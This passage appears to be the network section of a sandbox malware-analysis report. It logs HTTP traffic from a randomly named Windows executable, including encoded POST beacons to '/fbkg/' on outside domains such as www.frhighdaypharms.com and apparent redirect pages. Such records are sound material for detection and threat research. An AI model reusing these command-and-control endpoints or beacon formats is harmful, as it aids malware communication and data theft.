                                                                                                                                                                                                Data Raw: 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 2c 63 6b 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e8 bd bd e5 85 a5 e4 b8 ad e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 20 30 3b 6d 61 72 67 69 6e 3a 20 30 7d 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 78 79 6d 74 7a 30 33 2e 63 63 2f 63 70 63 30 35 2f 3f 63 68 61 6e 6e 65 6c 43 6f 64 65 3d 63 70 63 30 35 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 29d<!DOCTYPE html><html><head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KEgytRal2uFo3t2G",ck:"KEgytRal2uFo3t2G"})</script> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title></title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head><body><div id="wrap"> <iframe src="https://dxymtz03.cc/cpc05/?channelCode=cpc05"></iframe></div></body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1038.59.48.8680192.168.11.2050137C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:44.213428974 CET424OUTGET /fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:26:44.379849911 CET425INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:45 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 2c 63 6b 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e8 bd bd e5 85 a5 e4 b8 ad e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 20 30 3b 6d 61 72 67 69 6e 3a 20 30 7d 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 78 79 6d 74 7a 30 33 2e 63 63 2f 63 70 63 30 35 2f 3f 63 68 61 6e 6e 65 6c 43 6f 64 65 3d 63 70 63 30 35 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 29d<!DOCTYPE html><html><head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KEgytRal2uFo3t2G",ck:"KEgytRal2uFo3t2G"})</script> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title></title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head><body><div id="wrap"> <iframe src="https://dxymtz03.cc/cpc05/?channelCode=cpc05"></iframe></div></body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                11209.182.252.24580192.168.11.2050138C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:49.747857094 CET426OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4e 4b 31 77 6e 42 33 75 6b 38 2b 2f 4a 2f 36 4a 6f 63 69 42 6a 6a 6b 6b 30 69 52 6c 32 46 79 6f 4b 41 62 6f 5a 6a 2f 34 6f 75 4b 74 51 65 78 48 39 46 39 4f 55 6d 6f 6b 47 72 5a 64 77 59 65 55 5a 4a 36 5a 39 57 45 6e 31 34 68 4b 50 67 74 42 49 79 36 35 39 38 46 46 37 2f 6a 50 6e 6f 42 38 44 51 78 42 48 6c 64 58 72 59 6c 37 6f 32 75 62 39 44 49 62 37 42 6a 50 33 35 4c 6b 50 58 4f 6a 72 53 6a 33 46 66 33 4e 6a 6c 5a 76 57 56 38 6d 51 57 53 7a 4f 2b 70 42 76 50 36 61 4f 55 36 43 37 30 33 2f 46 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzNK1wnB3uk8+/J/6JociBjjkk0iRl2FyoKAboZj/4ouKtQexH9F9OUmokGrZdwYeUZJ6Z9WEn14hKPgtBIy6598FF7/jPnoB8DQxBHldXrYl7o2ub9DIb7BjP35LkPXOjrSj3Ff3NjlZvWV8mQWSzO+pBvP6aOU6C703/Fw==
                                                                                                                                                                                                Nov 17, 2023 19:26:49.917299032 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:49 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                11192.168.11.2050138209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:49.747857094 CET426OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4e 4b 31 77 6e 42 33 75 6b 38 2b 2f 4a 2f 36 4a 6f 63 69 42 6a 6a 6b 6b 30 69 52 6c 32 46 79 6f 4b 41 62 6f 5a 6a 2f 34 6f 75 4b 74 51 65 78 48 39 46 39 4f 55 6d 6f 6b 47 72 5a 64 77 59 65 55 5a 4a 36 5a 39 57 45 6e 31 34 68 4b 50 67 74 42 49 79 36 35 39 38 46 46 37 2f 6a 50 6e 6f 42 38 44 51 78 42 48 6c 64 58 72 59 6c 37 6f 32 75 62 39 44 49 62 37 42 6a 50 33 35 4c 6b 50 58 4f 6a 72 53 6a 33 46 66 33 4e 6a 6c 5a 76 57 56 38 6d 51 57 53 7a 4f 2b 70 42 76 50 36 61 4f 55 36 43 37 30 33 2f 46 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzNK1wnB3uk8+/J/6JociBjjkk0iRl2FyoKAboZj/4ouKtQexH9F9OUmokGrZdwYeUZJ6Z9WEn14hKPgtBIy6598FF7/jPnoB8DQxBHldXrYl7o2ub9DIb7BjP35LkPXOjrSj3Ff3NjlZvWV8mQWSzO+pBvP6aOU6C703/Fw==
                                                                                                                                                                                                Nov 17, 2023 19:26:49.917299032 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:49 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                12209.182.252.24580192.168.11.2050139C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:52.453125954 CET428OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 77 61 6f 4b 6b 66 6f 59 69 2f 34 34 2b 4b 74 45 4f 77 4e 79 6c 39 56 55 6d 73 73 47 70 4e 64 77 59 4b 55 66 34 61 5a 32 47 45 6f 36 6f 68 46 49 67 74 36 66 69 37 32 39 38 59 75 37 36 7a 50 6d 5a 64 38 43 53 70 42 52 55 64 55 34 6f 6c 39 38 47 75 59 33 6a 49 64 37 42 75 38 33 38 75 5a 50 41 79 6a 72 7a 44 33 43 66 33 4f 35 6c 59 6e 4c 46 39 56 51 31 44 6d 57 49 64 61 2b 2b 47 37 4e 78 72 4a 32 46 53 78 52 77 6b 47 63 33 36 55 45 48 6b 6c 32 4e 5a 70 59 63 33 66 38 76 43 42 78 42 63 31 33 64 63 4e 68 4a 79 4c 7a 61 58 51 6b 58 58 46 78 50 73 46 6e 43 37 53 6d 49 31 4d 68 57 53 4f 47 77 71 38 65 77 51 63 79 77 74 4a 50 6d 6d 6b 38 56 70 42 55 67 76 5a 58 58 45 39 4f 32 6b 59 61 76 45 46 6d 66 58 51 34 6e 36 65 50 61 51 70 4f 54 41 74 6b 77 58 6e 45 77 78 49 4f 6f 33 41 31 6e 55 6c 30 4d 30 34 65 6d 78 67 36 44 36 72 61 2f 68 32 31 49 4e 48 33 66 2b 72 6a 78 52 5a 67 2f 33 46 6e 53 41 77 35 4d 4c 4a 4b 71 79 59 75 50 51 43 66 76 79 73 72 53 39 55 2f 64 79 6c 71 2b 6a 5a 45 44 50 77 2f 67 2b 4a 54 53 35 72 76 4f 33 46 56 66 6e 53 54 65 72 4f 34 45 33 69 57 70 6f 64 61 33 73 38 39 4c 2b 2f 6d 32 7a 4a 62 67 7a 4f 46 4c 46 2b 56 76 54 61 75 6e 72 32 48 59 4b 64 58 51 75 73 2f 51 2f 42 74 4d 51 44 58 69 79 55 6d 52 58 74 4a 6f 31 54 66 61 54 62 63 58 78 52 41 43 59 61 39 56 41 6d 79 48 4d 6c 67 4a 63 46 2f 38 7a 6e 75 48 4a 56 64 30 4b 52 56 51 46 45 47 66 35 30 65 37 44 38 30 48 66 52 4d 46 4b 31 74 52 36 69 5a 2b 63 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzMrlwkifu1M+8Df6JxsiFjjok0jki2waoKkfoYi/44+KtEOwNyl9VUmssGpNdwYKUf4aZ2GEo6ohFIgt6fi7298Yu76zPmZd8CSpBRUdU4ol98GuY3jId7Bu838uZPAyjrzD3Cf3O5lYnLF9VQ1DmWIda++G7NxrJ2FSxRwkGc36UEHkl2NZpYc3f8vCBxBc13dcNhJyLzaXQkXXFxPsFnC7SmI1MhWSOGwq8ewQcywtJPmmk8VpBUgvZXXE9O2kYavEFmfXQ4n6ePaQpOTAtkwXnEwxIOo3A1nUl0M04emxg6D6ra/h21INH3f+rjxRZg/3FnSAw5MLJKqyYuPQCfvysrS9U/dylq+jZEDPw/g+JTS5rvO3FVfnSTerO4E3iWpoda3s89L+/m2zJbgzOFLF+VvTaunr2HYKdXQus/Q/BtMQDXiyUmRXtJo1TfaTbcXxRACYa9VAmyHMlgJcF/8znuHJVd0KRVQFEGf50e7D80HfRMFK1tR6iZ+c=
                                                                                                                                                                                                Nov 17, 2023 19:26:52.624144077 CET429INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:52 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                12192.168.11.2050139209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:52.453125954 CET428OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 77 61 6f 4b 6b 66 6f 59 69 2f 34 34 2b 4b 74 45 4f 77 4e 79 6c 39 56 55 6d 73 73 47 70 4e 64 77 59 4b 55 66 34 61 5a 32 47 45 6f 36 6f 68 46 49 67 74 36 66 69 37 32 39 38 59 75 37 36 7a 50 6d 5a 64 38 43 53 70 42 52 55 64 55 34 6f 6c 39 38 47 75 59 33 6a 49 64 37 42 75 38 33 38 75 5a 50 41 79 6a 72 7a 44 33 43 66 33 4f 35 6c 59 6e 4c 46 39 56 51 31 44 6d 57 49 64 61 2b 2b 47 37 4e 78 72 4a 32 46 53 78 52 77 6b 47 63 33 36 55 45 48 6b 6c 32 4e 5a 70 59 63 33 66 38 76 43 42 78 42 63 31 33 64 63 4e 68 4a 79 4c 7a 61 58 51 6b 58 58 46 78 50 73 46 6e 43 37 53 6d 49 31 4d 68 57 53 4f 47 77 71 38 65 77 51 63 79 77 74 4a 50 6d 6d 6b 38 56 70 42 55 67 76 5a 58 58 45 39 4f 32 6b 59 61 76 45 46 6d 66 58 51 34 6e 36 65 50 61 51 70 4f 54 41 74 6b 77 58 6e 45 77 78 49 4f 6f 33 41 31 6e 55 6c 30 4d 30 34 65 6d 78 67 36 44 36 72 61 2f 68 32 31 49 4e 48 33 66 2b 72 6a 78 52 5a 67 2f 33 46 6e 53 41 77 35 4d 4c 4a 4b 71 79 59 75 50 51 43 66 76 79 73 72 53 39 55 2f 64 79 6c 71 2b 6a 5a 45 44 50 77 2f 67 2b 4a 54 53 35 72 76 4f 33 46 56 66 6e 53 54 65 72 4f 34 45 33 69 57 70 6f 64 61 33 73 38 39 4c 2b 2f 6d 32 7a 4a 62 67 7a 4f 46 4c 46 2b 56 76 54 61 75 6e 72 32 48 59 4b 64 58 51 75 73 2f 51 2f 42 74 4d 51 44 58 69 79 55 6d 52 58 74 4a 6f 31 54 66 61 54 62 63 58 78 52 41 43 59 61 39 56 41 6d 79 48 4d 6c 67 